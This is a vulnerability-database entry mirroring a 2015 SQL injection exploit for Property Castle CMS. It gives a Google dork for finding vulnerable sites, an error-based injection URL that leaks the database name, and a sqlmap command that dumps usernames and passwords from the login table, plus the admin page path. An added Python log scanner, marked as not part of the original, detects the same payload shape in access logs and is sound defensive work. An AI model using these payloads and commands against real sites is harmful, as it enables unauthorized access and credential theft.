Property Castle CMS post SQL injection

Vulnerability ID: 1041161    Vulnerability type: (not given)
Published: 2015-10-06    Updated: 2015-10-06
CVE ID: N/A    CNNVD-ID: N/A
Platform: N/A    CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2015100050
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
# Exploit Title: Property Castle CMS post SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: kali linux on iceweasel browser
# EXPLOIT
1- Get the database name: http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have the database name
2- We search for the "contact us" page
3- We use the "http header" to get the data names (all POST data are injectable, I will use the first in this example)
4- We use the sqlmap tool now and inject it with the POST method
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php
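As an added defensive example (not part of the original advisory or the exploit author's listing), the following Python scans web-server access logs for the error-based injection shape used above: a quote break, `and`/`or`, `updatexml()` or `extractvalue()`, and a `concat()`/`database()`-style call, after URL-decoding and unwrapping MySQL `/*!50000...*/` version comments. The log lines, IP addresses and the `/search.php` request are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page); the first and
# fourth requests carry the error-based payload shape shown in the exploit listing.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Oct/2015:12:00:01 +0000] "GET /cms/cms.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+ HTTP/1.1" 500 812
203.0.113.7 - - [05/Oct/2015:12:00:09 +0000] "GET /cms/cms.php?link_id=4 HTTP/1.1" 200 5120
198.51.100.2 - - [05/Oct/2015:12:01:33 +0000] "GET /search.php?q=update+my+xml+file HTTP/1.1" 200 2210
203.0.113.7 - - [05/Oct/2015:12:02:44 +0000] "GET /cms/cms.php?link_id=4'%20AND%20ExtractValue(1,/*!Concat*/(0x3a,user()))-- HTTP/1.1" 500 790
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# MySQL executes the body of /*!NNNNN ... */ comments, so unwrap them before matching.
VERSION_COMMENT_RE = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
ERROR_BASED_RE = re.compile(
    r"""['"]\s*(?:and|or)\s+(?:updatexml|extractvalue)\s*\(.*\b(?:concat|database|user|version)\s*\(""",
    re.I | re.S,
)

def normalize(url):
    """Decode URL encoding (twice, to catch double-encoded payloads) and unwrap
    MySQL version comments so /*!50000concat*/ is seen as plain concat."""
    decoded = unquote_plus(unquote_plus(url))
    return VERSION_COMMENT_RE.sub(r"\1", decoded).lower()

def is_error_based_sqli(url):
    """True when the request matches the quote-break + updatexml/extractvalue
    + function-call shape used for MySQL error-based data extraction."""
    return bool(ERROR_BASED_RE.search(normalize(url)))

def scan_log(text):
    """Return (client_ip, raw_request_path) for every log line that matches."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_error_based_sqli(m.group(1)):
            hits.append((line.split()[0], m.group(1)))
    return hits

if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}")
```

The benign `/search.php?q=update+my+xml+file` line is deliberately included to show that keyword-only matching would false-positive where the structural check does not.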